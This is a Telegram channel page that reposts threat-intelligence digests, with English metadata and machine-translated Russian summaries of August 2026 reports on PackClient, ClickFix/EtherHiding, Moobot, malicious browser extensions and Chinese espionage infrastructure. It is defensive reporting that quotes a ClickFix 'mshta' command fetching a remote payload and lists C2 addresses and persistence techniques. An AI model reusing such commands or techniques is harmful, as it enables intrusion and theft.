CTT Report Hub
3.47K subscribers
10.3K photos
6 videos
67 files
14K links
Threat Intelligence Report Hub
Download Telegram
CTT Report Hub
#ParsedReport #CompletenessHigh 27-08-2026 [Op Report\] PackClient: Hands-on-Keyboard with a new C2 Framework https://blog.deception.pro/blog/new-packclient-hok-aug2026 Report completeness: High Actors/Campaigns: Ta4922 Threats: Packclient Donut Packclientlauncher…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)

------
TA4922 использовал RAT PackClient в атаке с тематикой налогообложения, обеспечив закрепление (persistence) посредством замаскированной запланированной задачи и внедрения в пустой процесс (Process Hollowing). Актор отключил UAC, загрузил инструменты и установил компоненты ManageEngine Endpoint Central/UEMS для проведения обнаружения хостов, перечисления объектов Active Directory, сканирования и удаленного управления, маскируясь под легитимную административную активность.
-----

Proofpoint зафиксировала деятельность китайскоязычного злоумышленника, отслеживаемого под идентификатором TA4922, который использовал модульный RAT PackClient в ходе атаки с использованием налоговой тематики против рабочей станции Windows, подключенной к домену Active Directory. Жертва запустила файл `Tax_Notice_10029.exe` с образа диска `ITR_DOCUMENT`, что соответствует кампаниям, в рамках которых вредоносные исполняемые файлы доставляются через файлы IMG и приманки, связанные с налогами. Вредоносное ПО создало запланированную задачу `NvSvc`, настроенную на запуск при входе в систему с наивысшими привилегиями из пути, маскирующегося под службу NVIDIA. Затем оно выполнило полостное внедрение (process hollowing) в 32-битный экземпляр `svchost.exe`, запущенный без аргументов, который поддерживал собственный TCP-канал C2 с адресом `192.252.180.45:6666` примерно каждые две минуты, в том числе после перезагрузки системы.

Примерно через четыре с половиной часа оператор начал выполнять действия с использованием клавиатуры и мыши (hands-on-keyboard) через RAT. Скрипт на VBScript отключал запросы UAC, многократно устанавливая значение параметра `ConsentPromptBehaviorAdmin` в `0`, а затем использовал переименованный, подписанный Microsoft файл `curl.exe` (`sys31.dll`) с отключенной проверкой сертификатов для загрузки пакета с домена `opkjhblll.cc`. Дополнительные скрипты в фоновом режиме установили агент ManageEngine Endpoint Central/UEMS с помощью `msiexec`, созданного атакующим преобразования (transform) и управляемых атакующим корневых сертификатов. Агент зарегистрировался на сервере Endpoint Central по адресу `192.229.87.219` через порты `8383` и `8027`, используя имя хоста `WIN-N3U83AJBEEH`.

После установки злоумышленник использовал легитимные компоненты UEMS, подписанные Zoho, для инвентаризации хостов, обнаружения программного и аппаратного обеспечения, перечисления пользователей и групп Active Directory через SAMR/LSAD, сканирования на наличие патчей и ошибок конфигурации, а также для интерактивного удаленного управления. После перезагрузки сервер развернул DeviceControl — драйвер файлового фильтра ядра, функциональность управления BitLocker, а также компоненты EDR для защиты от программ-вымогателей от ManageEngine. Эти действия обеспечивали широкие возможности управления и контроля, одновременно маскируясь под легитимную деятельность по управлению конечными точками.

Ключевые возможности для обнаружения включают внедрение в пустой процесс и beaconing PackClient, запланированную задачу `NvSvc`, изменение реестра UAC из хостов скриптов, переименованные бинарные файлы `curl.exe`, установку UEMS из каталогов, доступных для записи пользователем, неожиданные адреса серверов UEMS, корневые сертификаты, установленные злоумышленником, а также исходящие соединения на порты 6666, 8383 и 8027.
#ParsedReport #CompletenessHigh
26-08-2026

Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator Using Known Vulnerabilities

https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor

Report completeness: High

Threats:
Sliver_c2_tool
Metasploit_tool
Mettle
Meterpreter_tool
Etherhiding_technique
Clickfix_technique

Victims:
Nuclear research, Marine engineering and shipbuilding, Philippine navy

Industry:
Financial, Petroleum, Critical_infrastructure, Maritime, Government

Geo:
Asia, Philippine, Philippines, Netherlands, Chinese, China

CVEs:
CVE-2024-28000 [Vulners]
CVSS V3.1: 9.8,
Vulners: Exploitation: Unknown
X-Force: Risk: Unknown
X-Force: Patch: Unknown
Soft:
- litespeedtech litespeed_cache (<6.4)

CVE-2023-49105 [Vulners]
CVSS V3.1: 9.8,
Vulners: Exploitation: True
X-Force: Risk: Unknown
X-Force: Patch: Unknown
Soft:
- owncloud owncloud_server (<10.13.1)


TTPs:
Tactics: 2
Technics: 11

IOCs:
IP: 3
Hash: 2
File: 24
Coin: 1
Url: 3

Soft:
WordPress, BitLocker, KeePass, SimpleHTTP, OpenSSH, Ubuntu, LiteSpeed

Crypto:
ethereum

Algorithms:
sha256, prng, pbkdf2, sha512

Functions:
mt_rand

Languages:
php, python

Platforms:
cross-platform
CTT Report Hub
#ParsedReport #CompletenessHigh 26-08-2026 Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator Using Known Vulnerabilities https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor Report…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)

------
Предположительно, операторы, говорящие на китайском языке, скомпрометировали организации Филиппин, связанные с государственным управлением, ядерными исследованиями и обороной, путем эксплуатации уязвимых систем ownCloud и WordPress. Они использовали собственные инструменты для обхода аутентификации, создания учетных записей администраторов, кражи конфиденциальных данных исследований, данных сотрудников, учетных данных и операционных данных, а также для подготовки к развертыванию ВПО, включая полезную нагрузку Mettle.
-----

Предположительно, операторы, говорящие на китайском языке, атаковали организации правительства Филиппин, организации в области ядерных исследований и организации, связанные с оборонным сектором, используя известные уязвимости и собственные инструменты. На открытом сервере по адресу 31.58.209.241:8000 размещались скрипты на Python, журналы передачи данных, украденные данные, инструменты для наступательной безопасности и загрузчик первого этапа в формате ELF под названием `multi_backupd` (SHA-256: `7447d0d0c34779d4c519823b39bf6ddc16d2b34a226b82ee69da6f5b4a77ad82`). Загрузчик устанавливал соединение с тем же IP-адресом на TCP-порту 8090 для получения полезной нагрузки Mettle.

Пять инструментов на Python эксплуатировали уязвимость CVE-2023-49105 в уязвимых развертываниях ownCloud. Скрипты генерировали предварительно подписанные URL, используя пустой секрет подписи PBKDF2, имитировали указанные учетные записи с помощью заголовка `OC-Credential` и получали файлы по протоколу WebDAV без аутентификации. Один из скриптов использовал запросы `PROPFIND` для перечисления каталогов и фиксировал загрузки локально. Комментарии, строки документации, сообщения журнала и каталоги вывода на упрощенном китайском языке указывали на оператора, говорящего на китайском языке.

Восстановленные каталоги промежуточного хранения содержали примерно 372 МБ данных, тогда как CSV-файл ссылался на объём украденных материалов около 9 ГБ. В собранные данные входили учётные записи, связанные с ядерными материалами, базы данных компонентов исследовательских реакторов, инвентаризация топлива, документы по радиационной безопасности, стратегические и ИТ-планы, персональные данные сотрудников (PII), записи о паспортах и поездках, а также хранилища учётных данных, содержащие материалы восстановления KeePass, AxCrypt и BitLocker. SQL-дамп системы ZKTeco BioTime объёмом 192 МБ содержал данные о сотрудниках, бейджах, отделах и журналах доступа, связанные с филиппинскими научными и исследовательскими организациями.

Филиппинская компания в области морского машиностроения и судостроения, связанная с ВМС, была скомпрометирована через её сайт на WordPress. Оператор эксплуатировал уязвимость CVE-2024-28000 в плагине LiteSpeed Cache, используя собственную реализацию на языке Go функций `mt_rand()` и MT19937 из PHP для брутфорса сидов хеша безопасности и создания учётной записи администратора. Отдельный инструмент на Python использовал интерфейс XML-RPC WordPress и словарь `rockyou.txt` для брутфорса учётной записи `admin`. Выведенные данные включали полную установку WordPress, медиафайлы, содержимое базы данных, хеши паролей, настройки плагинов и секретные ключи.

На том же сайте WordPress также присутствовало, предположительно, не связанное с ним заражение EtherHiding/ClickFix, в котором использовались размещенные в блокчейне HTML-файлы, постоянный сервис-воркер, доставка через `mshta` и VBS, а также сбор информации о жертве. Никаких доказательств, связывающих эту активность с предположительно китайскоязычным оператором, не обнаружено.
#ParsedReport #CompletenessHigh
27-08-2026

EtherHiding in the Browser: ClickFix Chain Ends in Amatera

https://www.netskope.com/blog/etherhiding-in-the-browser-clickfix-chain-ends-in-amatera

Report completeness: High

Threats:
Etherhiding_technique
Clickfix_technique
Amatera_stealer
Polyglot_technique
Emmenhtal
Errtraffic
Dead_drop_technique
Lolbin_technique
Acr_stealer
Acridrain

Victims:
Wordpress sites, Logged out website visitors

Industry:
Financial

TTPs:
Tactics: 2
Technics: 0

ChatGPT TTPs:
do not use without manual check
T1027, T1027.003, T1027.013, T1036.005, T1041, T1053.005, T1059.001, T1059.003, T1059.005, T1071.001, have more...

IOCs:
Url: 6
File: 18
Coin: 1
Domain: 4
Path: 2
Hash: 6

Soft:
WordPress, macOS, Chrome

Crypto:
ethereum

Algorithms:
ecdh, rc4, base64, aes-gcm, sha256, md5

Functions:
skipWaiting, getActiveScripts, getDemoPage, getScript

Languages:
vbscript, php, powershell

Platforms:
x86

Links:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs
CTT Report Hub
#ParsedReport #CompletenessHigh 27-08-2026 EtherHiding in the Browser: ClickFix Chain Ends in Amatera https://www.netskope.com/blog/etherhiding-in-the-browser-clickfix-chain-ends-in-amatera Report completeness: High Threats: Etherhiding_technique Clickfix_technique…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)

------
Кампания, нацеленная на WordPress, использует постоянный Service Worker для внедрения приманки ClickFix, которая побуждает пользователей Windows выполнить команду `mshta`. Это запускает цепочку Emmenhtal в памяти, основанную на PowerShell, которая в конечном итоге развертывает стиллер информации Amatera/AcridRain, выгружающий учетные данные и системные данные по TLS.
-----

Массовая кампания по компрометации сайтов на платформе WordPress заражает сотни сайтов вредоносным must-use-плагином, который регистрирует постоянный Service Worker. Этот worker перехватывает управление страницами посетителей, удаляет защитные механизмы Content-Security-Policy и внедряет скрипт исключительно для незарегистрированных пользователей. Для обхода администраторов исключаются пути входа в WordPress и административные разделы, аутентифицированные сессии, а также управляемый оператором тестовый cookie. Поскольку Service Worker сохраняется в браузерах даже после очистки на стороне сервера, для устранения последствий необходимо отменить его регистрацию и удалить связанные с ним кэши.

Вставленный скрипт использует ethers.js для запроса к смарт-контракту только для чтения в блокчейне Base по адресу `0x58460d0b3d4d6b03761c89120393c0c676676496`. Контракт хранит активную полезную нагрузку, включая поддельную страницу reCAPTCHA, реализуя EtherHiding с помощью механизма on-chain dead-drop. Приманка инструктирует пользователей Windows скопировать и выполнить команду `mshta http://timelevel12[.\]com/big` через диалоговое окно «Выполнить», в то время как пользователи других операционных систем получают безвредную отвлекающую информацию. Эта техника ClickFix зависит от ручного выполнения команды жертвой, что позволяет избежать стандартного сканирования вложений или загрузок.

HTA-нагрузка декодирует команду, создающую скрытую запланированную задачу с именем `serviceerg` через COM-интерфейс Schedule.Service. Задача запускает PowerShell с использованием замаскированного пути с подстановочным символом и закодированной команды. Этап PowerShell обходит Constrained Language Mode, модифицирует `amsiContext` для отключения сканирования AMSI, выполняет профилирование хоста и исполняет последующий код в памяти. Он загружает загрузчик Emmenhtal с домена `gpuh[.\]gravityzone[.\]army`, используя User-Agent, имитирующий браузер. Emmenhtal извлекает встроенную нагрузку из JPEG-файла, размещенного на `i.ibb[.\]co`, и загружает её в память как PE-файл с помощью рефлексивной загрузки, не оставляя исполняемого файла на диске.

Финальный полезный груз — Amatera, также известный как ребрендинг ACR Stealer/AcridRain, замаскированный через метаданные под `WPA.exe`. Он крадет учетные данные и системную информацию, устанавливает корневой сертификат и взаимодействует с `gw[.\]proxyvector[.\]cc` по TLS. Разрешение DNS выполняется через провайдеры DNS-over-HTTPS, включая Google и Cloudflare, что скрывает запросы к C2 внутри зашифрованного DNS-трафика. Специалисты по защите должны отслеживать указанную инфраструктуру, активность смарт-контрактов в блокчейне, подозрительное выполнение `mshta`, скрытые запланированные задачи, вмешательство в AMSI, регистрацию Service Worker и трафик браузера к конечным точкам Base RPC.
#ParsedReport #CompletenessMedium
26-08-2026

Inside China-nexus cyber espionage infrastructure

https://www.lumen.com/blog/en-us/the-infrastructure-quartermaster-inside-a-china-nexus-state-enablement-model

Report completeness: Medium

Threats:
Fast_labyrinth_tool
Qscan_tool
Qtrouter
Qtproxy_tool
Raptor_train
Kv-botnet
Supply_chain_technique

Victims:
Research universities, Government, Defense, Public sector, Military, Healthcare, Critical infrastructure, Energy supply chains, Financial services, Enterprise software, have more...

Industry:
Military, Education, Telco, Energy, Critical_infrastructure, Healthcare, Government, Logistic, Iot, Aerospace

Geo:
Chinese, Asia-pacific, China

ChatGPT TTPs:
do not use without manual check
T1001, T1046, T1090.002, T1573, T1592.002

IOCs:
Domain: 18
IP: 5

Soft:
ORB network, RabbitMQ, Redis

Links:
https://github.com/blacklotuslabs/IOCs/blob/main/Quartermaster\_IOCs.txt
CTT Report Hub
#ParsedReport #CompletenessMedium 26-08-2026 Inside China-nexus cyber espionage infrastructure https://www.lumen.com/blog/en-us/the-infrastructure-quartermaster-inside-a-china-nexus-state-enablement-model Report completeness: Medium Threats: Fast_labyrinth_tool…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)

------
Китайский «квартермейстер» обеспечивает злоумышленников инфраструктурой для шпионажа, объединяя разведку с помощью QScan, маршрутизацию через прокси Fast Labyrinth и администрирование с использованием QTRouter/QTProxy. Для сокрытия трафика используются коммерческие китайские прокси-сервисы и ротация узлов YotoCloud, при этом сканирование уязвимых систем может предшествовать интерактивному доступу, перемещению внутри компании, закреплению или краже данных.
-----

В отчете описывается инфраструктурный провайдер кибершпионажа с привязкой к Китаю, действующий в роли «квартельмейстера» для нескольких злоумышленников нижестоящего уровня. Его сервисный слой объединяет разведку, коммерческий прокси-доступ, маршрутизацию трафика и административный контроль. Инфраструктура включает QScan для профилирования целей, Fast Labyrinth для маскированных коммуникаций, устройства QTRouter для аутентифицированного доступа и QTProxy для управления прокси-узлами и построения релейных путей.

Группа Fast Labyrinth использует коммерческие китайские прокси-сервисы «Airport», в частности fastlink.ws, вместо создания сети ORB исключительно на основе скомпрометированных устройств. Трафик маршрутизируется через выбранные узлы исходящего трафика с высокой пропускной способностью, связанные с доменами `flanycast-*.yotocloud.com` и `flnode-*.yotocloud.com`. Эти узлы используют коммерческую транзитную инфраструктуру, ротацию пулов IP-адресов и объемы потребительского трафика для сокрытия разведывательной деятельности и обхода статических IP-ориентированных средств защиты. Сеть поддерживает как предварительно настроенные маршруты, так и кастомные пути к целевым организациям.

Операторы получают доступ к прокси-сети и управляют ею с помощью аппаратного обеспечения QTRouter и административной плоскости QTProxy. Соответствующая инфраструктура включает `www.qtproxy.xyz`, `qt-proxy.org`, `jump.qt-proxy.org` и `instantmessagehub.tech`. Административные сессии наблюдались из адресного пространства China Telecom и China Unicom в Нанкине, при этом соединения также затрагивали прокси-узлы YotoCloud, что указывает на тестирование и калибровку инфраструктуры перед использованием клиентами.

QScan функционирует как отдельный фреймворк разведки, использующий брокер задач Celery/RabbitMQ на `mq-task.qt-proxy.org` или связанной инфраструктуре `mq-task-qt-team.com`, глобально распределённых рабочих узлов сканера и бэкенд результатов на базе Redis на `mq-result.qt-proxy.org` или `mq-result-qt-team.com`. Рабочие узлы ротируются по сетям /24 с циклом примерно в 30 дней и собирают открытые порты, баннеры приложений, отпечатки операционных систем и данные конфигурации.

Сканирование следовало двум паттернам: широкая разведка периметра военных, государственных и оборонных сетей, а также более тихий анализ на уровне приложений в отношении организаций в сферах исследований, здравоохранения, энергетики, финансов, инфраструктуры и программного обеспечения. Многие цели QScan впоследствии получили двунаправленные соединения Fast Labyrinth, что указывает на переход от разведки к интерактивной эксплуатации, перемещению внутри компании, созданию постоянных скрытых каналов связи или краже данных. Среди целевых систем были обнаружены открытые среды разработки, не обновлённое облачное хранилище, интерфейсы удалённого доступа и инфраструктура, связанная с учётными данными.
#ParsedReport #CompletenessMedium
27-08-2026

Open Directory Exposes Moobot Source Code and Ongoing Activity Post 2024 Court-Authorized Disruption

https://censys.com/blog/open-directory-exposes-moobot-source-code-and-activity/

Report completeness: Medium

Actors/Campaigns:
Fancy_bear (motivation: cyber_criminal)

Threats:
Moobot
Flooder
Mirai
Disttrack
Wannacry

Victims:
China mobile, Chinese citizens

Industry:
Iot, Government

Geo:
Chinese, Russian, Asia, China

ChatGPT TTPs:
do not use without manual check
T1059.006, T1071.001, T1095, T1105, T1498.001, T1571, T1589

IOCs:
IP: 6
File: 3
Domain: 1
Url: 1

Soft:
Minecraft, Linux, Android

Win API:
ARC

Languages:
python, php
CTT Report Hub
#ParsedReport #CompletenessMedium 27-08-2026 Open Directory Exposes Moobot Source Code and Ongoing Activity Post 2024 Court-Authorized Disruption https://censys.com/blog/open-directory-exposes-moobot-source-code-and-activity/ Report completeness: Medium…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)

------
Некорректно настроенный сервер раскрыл исходный код и операционные данные Moobot, что выявило возможности ботнета для IoT-устройств, основанного на Mirai, спящие функции HTTP-загрузки и выполнения, а также признаки продолжающейся активности после его нейтрализации в 2024 году. На этом же сервере размещались независимая панель DDoS, нацеленная на серверы Minecraft, и мошеннический китайский сервис верификации личности.
-----

Некорректно настроенный открытый каталог на 86.53.111.212:8080 привел к утечке исходного кода и операционных данных, связанных с Moobot — ботнетом для IoT-устройств, производным от Mirai, а также независимых инструментов для проведения атак на отказ в обслуживании и мошеннического китайского сервиса верификации личности. Утеченные материалы были собраны 30 июля 2026 года и включали журналы атак, свидетельствующие о том, что несколько сервисов оставались активными после санкционированного судом в феврале 2024 года нарушения работы ботнета Moobot.

Восстановленный исходный код Moobot содержит идентификаторы, связанные с известными образцами, включая заголовок регистрации C2 0x336699 и 32-символьный случайный строковый сид `w5q6he3dbrsgmclkiu4to18npavj702f`. Moobot использует собственный протокол C2, аналогичный протоколу Mirai, и поддерживает команды для управления зараженными устройствами и запуска сетевых наводнений (flood-атак). Исходный код также содержит две ранее не задокументированные подпрограммы загрузки и выполнения. Хотя они находятся в неактивном состоянии — одна закомментирована, а другая никогда не вызывается, — эта функциональность позволяла бы оператору C2 направлять зараженные устройства на загрузку ELF-бинарного файла по HTTP, сохранение его в виде исполняемого файла, переименование, создание дочернего процесса (fork) и выполнение. Эта возможность рассматривается как правдоподобный механизм для зафиксированного переиспользования Moobot группировкой APT28, хотя способ получения доступа остается неизвестным.

В каталоге также содержалась StresD Pro+ — панель управления DDoS-атаками на базе Node.js/Express и WebSocket, с отдельными сервисами для пользователей и администраторов. Записи панели фиксировали 32 атаки, в которых участвовали шесть клиентов, на дату сбора данных. В отличие от Moobot, панель запускает локальный Python-скрипт, который генерирует трафик непосредственно с сервера промежуточного хранения (staging server), что превращает активность в атаку типа «отказ в обслуживании» (DoS), а не в распределённую атаку. Скрипт нацелен на серверы Minecraft Bedrock Edition, выполняет рукопожатие RakNet и отправляет некорректные инкапсулированные пакеты и рандомизированные последовательности NACK.

Отдельный сервис на порту 3000 имитировал китайскую систему верификации личности, используемую органами общественной безопасности. Исходный код показал, что отправляемые имена и 18-значные номера национальных удостоверений личности Китая передавались стороннему API, а ответ возвращался в виде результата о совпадении или поддельной личности. В ходе мониторинга позже был выявлен активный C2 Moobot по адресу 162.141.92.192:14123, связанный с более чем 500 задачами атак короткой продолжительности в августе 2026 года.
#ParsedReport #CompletenessLow
27-08-2026

19 Chrome and Edge Extensions Deliver a Wallet Drainer and Credential-Stealing Payloads

https://socket.dev/blog/chrome-edge-extension-wallet-drainer

Report completeness: Low

Threats:
Credential_stealing_technique
Clickfix_technique

Victims:
Cryptocurrency wallet users, Browser extension users

TTPs:
Tactics: 1
Technics: 0

ChatGPT TTPs:
do not use without manual check
T1027, T1056.003, T1059.007, T1071.001, T1105, T1176, T1195.002, T1562.001, T1573.001, T1656, have more...

IOCs:
File: 16
Domain: 28
BrowserExtension: 18
Coin: 1

Soft:
Chrome, Ledger Live, Outlook, Microsoft Edge

Wallets:
tron, trezor, coinbase, bybit, metamask

Crypto:
solana, kucoin, binance

Algorithms:
sha256, aes-gcm

Functions:
setInterval, k, removeRuleIds

Win API:
sendMessage

Languages:
javascript

Links:
https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DualFunction-Malware-Chrome-Extensions
CTT Report Hub
#ParsedReport #CompletenessLow 27-08-2026 19 Chrome and Edge Extensions Deliver a Wallet Drainer and Credential-Stealing Payloads https://socket.dev/blog/chrome-edge-extension-wallet-drainer Report completeness: Low Threats: Credential_stealing_technique…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)

------
Кампания «Superior» использовала 19 браузерных расширений, которые выглядели легитимными, пока в последующих обновлениях не было добавлено ВПО. Расширения обходили средства безопасности браузера, поддерживали связь с C2 и удалённо загружали JavaScript-нагрузки. Эти нагрузки в основном похищали фразы восстановления криптографических кошельков через поддельные страницы Ledger и Trezor, а также обеспечивали кражу учётных данных и атаки социальной инженерии.
-----

Исследователи Socket выявили 18 вредоносных расширений для Chrome и одно расширение для Edge, связанных с кампанией, отслеживаемой под именем «Superior». Среди расширений были инструменты SEO, утилиты для работы с криптовалютами, инструменты для отслеживания рекламы и приложения для поиска на экране. Четырнадцать расширений были созданы злоумышленниками, а пять были приобретены у легитимных разработчиков. Операторы первоначально публиковали чистые версии, предлагающие заявленную функциональность, а затем внедряли вредоносное поведение в последующих обновлениях после установления доверия пользователей. Одно из расширений, «Enable Right Click & Copy - Smart Unlock + OCR», имело около 70 000 пользователей в Chrome, а связанная с ним версия для Edge — около 10 000 пользователей, что создавало значительный потенциальный риск воздействия через автоматические обновления браузера.

Вредоносное ПО использует фоновый сервисный воркер для управления идентификаторами жертв, временными параметрами выполнения, конфигурацией C2 и загруженными модулями JavaScript в локальном хранилище расширения Chrome. Недавние версии поддерживают постоянное соединение WebSocket с сервером C2 с периодическими сигналами о работоспособности (heartbeats). Инструкции C2 могут ротировать конечные точки и указывать отдельную инфраструктуру для эксфильтрации данных для отдельных жертв. Загруженные модули шифруются с помощью AES-GCM, используя ключ, производный от идентификатора расширения и UUID установки. В рамках кампании использовались домены, размещенные на инфраструктуре, включающей домены зон `.top`, `.sbs` и Cloudflare Workers.

Для обеспечения выполнения кода на посещаемых веб-сайтах расширения регистрируют декларативные сетевые правила, которые удаляют заголовки Content-Security-Policy со страниц и фреймов. Затем контент-скрипты динамически внедряют сохранённые вредоносные модули с помощью `chrome.scripting.executeScript`. Модули создают временные скрытые элементы DOM и обработчики событий для выполнения JavaScript в основном мире веб-страницы, после чего элементы удаляются для минимизации следов.

Наблюдаемые полезны нагрузки в первую очередь нацелены на пользователей криптовалют. На сайтах Ledger и Trezor вредоносное ПО выполняет захват всей страницы и отображает реалистичные поддельные сценарии обновления или восстановления кошелька, запрашивая фразы восстановления из 12, 18 или 24 слов. Эти сид-фразы перехватываются и выгружаются наружу, что позволяет осуществить компрометацию кошелька и кражу криптовалюты. Другие модули доставляют поддельные приманки в виде обновлений браузера, которые могут копировать управляемые атакующим команды в буфер обмена и инструктировать жертв вставить и выполнить их. Фреймворк полезной нагрузки расширяем, что позволяет удалённо развертывать дополнительные модули для кражи учётных данных, опустошения кошельков и социальной инженерии.
#ParsedReport #CompletenessMedium
27-08-2026

Carry-On Compromise: TA4922 Packs PackClient

https://www.proofpoint.com/us/blog/threat-insight/carry-compromise-ta4922-packs-packclient

Report completeness: Medium

Actors/Campaigns:
Ta4922 (motivation: information_theft, financially_motivated)

Threats:
Packclient
Dll_sideloading_technique
Donut
Packclientcore
Packclientlauncher
Mitm_technique
Valleyrat
Chinaz
Billgates

Victims:
Organizations

Industry:
Government, E-commerce

Geo:
China, Asia, Indian, India

TTPs:
Tactics: 1
Technics: 0

ChatGPT TTPs:
do not use without manual check
T1010, T1012, T1016, T1027, T1036.005, T1056.001, T1057, T1071.001, T1082, T1095, have more...

IOCs:
Domain: 1
IP: 8
File: 16
Url: 1
Hash: 10

Soft:
Telegram, WeChat

Algorithms:
base64, xor, zip

Win API:
CreateProcessW
CTT Report Hub
#ParsedReport #CompletenessMedium 27-08-2026 Carry-On Compromise: TA4922 Packs PackClient https://www.proofpoint.com/us/blog/threat-insight/carry-compromise-ta4922-packs-packclient Report completeness: Medium Actors/Campaigns: Ta4922 (motivation: information_theft…
#ParsedReport #ChatGPT #Translated
Autotext: (TI Report Analyser + ChatGPT + Auto Translate)

------
PackClient — это модульный RAT и фреймворк C2, используемый китайскоязычным актором TA4922 в фишинговых кампаниях с налоговой тематикой, нацеленных на Китай и Индию. Его многоэтапный полезный груз использует маскировку, подмену DLL (DLL sideloading), рефлексивную загрузку, закрепление через RunOnce и процесс-страж. PackClient поддерживает обширный набор функций наблюдения, кражи данных, удалённого доступа, развёртывания плагинов и пользовательских TCP-соединений C2.
-----

PackClient — это модульная троянская программа (RAT) и фреймворк управления, продвигаемый через китайскоязычные каналы в Телеграм. Он использовался китайскоязычным злоумышленником TA4922 в фишинговых кампаниях на налоговую тематику, нацеленных на организации в Китае и Индии. Жертвам направлялись ссылки на URL-адреса, контролируемые злоумышленником, или ZIP-архивы, содержащие исполняемые файлы или образы дисков IMG. Вредоносные нагрузки применяли маскировку, а в кампаниях, нацеленных на Индию, — подмену DLL (DLL sideloading) для запуска Donut Loader перед установкой PackClient.

ВПО использует многоступенчатую архитектуру. Первый этап представляет собой загрузчик, который проверяет наличие повышенных привилегий, извлекает зашифрованную полезную нагрузку второго этапа, расшифровывает её с помощью операции XOR, записывает во временный исполняемый файл, например `%TEMP%\svchost.exe`, устанавливает закрепление через параметр реестра `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` и запускает файл. В некоторых образцах выгруженная библиотека, например `xMain.dll`, выполняется через `rundll32.exe` с параметрами, содержащими URL полезной нагрузки и адрес C2. Затем PackClientLauncher устанавливает соединение с основным узлом C2, загружает модуль PackClientCore, выполняет его отражательную загрузку в память и запускает процесс-страж с параметром `-guard` для перезапуска основного процесса в случае его завершения.

PackClientCore поддерживает более 60 команд и способен поддерживать два независимых соединения C2. Его возможности включают перечисление процессов и окон, операции с реестром, повышение привилегий, функции удаленного рабочего стола, сбор данных из браузеров, управление файловой системой, наблюдение, регистрацию нажатий клавиш, манипуляцию буфером обмена, установку полезных нагрузок и плагинов, а также конфигурирование ВПО или обновление модулей. Он также определяет средства защиты, приложения для обмена сообщениями, браузеры и Telegram Desktop. Потенциальный плагин, специфичный для Telegram, может изменять файлы конфигурации Telegram для перенаправления трафика через прокси, контролируемый оператором.

Дополнительные плагины доставляются в виде данных DLL, закодированных в Base64, копируются в память, резолвятся и исполняются. Для связи используется собственный протокол на основе «сырых» TCP-соединений с кадрированными сообщениями, рукопожатиями, подтверждениями, сигналами «живости» (heartbeats), обменом командами, передачей системной информации и отправки скриншотов. В наблюдаемой инфраструктуре для доставки полезной нагрузки использовался адрес `154.36.188.98:8080`, а для C2 — адреса `206.238.196.96:6666`, `64.81.30.99` и `192.252.180.45:6666`. Возможности для обнаружения включают характерную командную строку `rundll32`, дерево процессов `svchost.exe` и `-guard`, маскировку в временных каталогах, закрепление через RunOnce, конфигурацию реестра PackClient и необычный TCP-трафик на порту 6666.
#ParsedReport #CompletenessHigh
27-08-2026

Caught in 4K: The Aurora Files

https://www.cloudsek.com/blog/aurora-ransomware-affiliate-ai-attack-planning-crypto-payments

Report completeness: High

Threats:
Bloodhound_tool
Nopac_tool
Petitpotam_vuln
Printerbug_tool
Eternalblue_vuln
Kerberoasting_technique
As-rep_roasting_technique
Netexec_tool
Shadow_copies_delete_technique
Supply_chain_technique
Certipy_tool
Ntlmrelayx_tool
Dcsync_technique
Kerbrute_tool
Hashcat_tool
Evil-winrm_tool
Chisel_tool
Proxychains_tool
Metasploit_tool
Windows_locker

Victims:
Manufacturing, Food and agriculture, Pharmaceutical and chemical distribution, Professional and consulting services

Industry:
Chemical, Healthcare, Foodtech, Logistic

Geo:
Russian, United states

TTPs:
Tactics: 4
Technics: 0

IOCs:
Domain: 1
IP: 8
Hash: 2

Soft:
Linux, Cloudflare R2, ESXi, Active Directory, Hyper-V, Azure AD

Algorithms:
sha256

Languages:
powershell, rust